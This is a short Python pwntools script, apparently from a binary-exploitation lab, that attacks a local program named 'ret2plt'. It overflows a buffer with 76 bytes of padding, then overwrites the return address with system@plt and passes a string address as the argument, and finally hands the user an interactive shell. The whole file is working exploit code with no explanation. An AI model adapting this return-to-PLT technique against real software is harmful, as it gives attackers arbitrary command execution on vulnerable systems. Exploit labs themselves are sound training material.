#!/usr/bin/python

from pwn import *


system_plt = 0x08048370
ed_str = 0x8049675
def main():
    # Start the process
    p = process("./ret2plt")

    # print the pid
    raw_input(str(p.proc.pid))

    # craft the payload
    payload = "A" * 76
    payload += p32(system_plt)
    payload += p32(0x41414141)
    payload += p32(ed_str)
    payload = payload.ljust(96, "\x00")

    # send the payload
    p.send(payload)

    # pass interaction to the user
    p.interactive()
    
if __name__ == "__main__":
    main()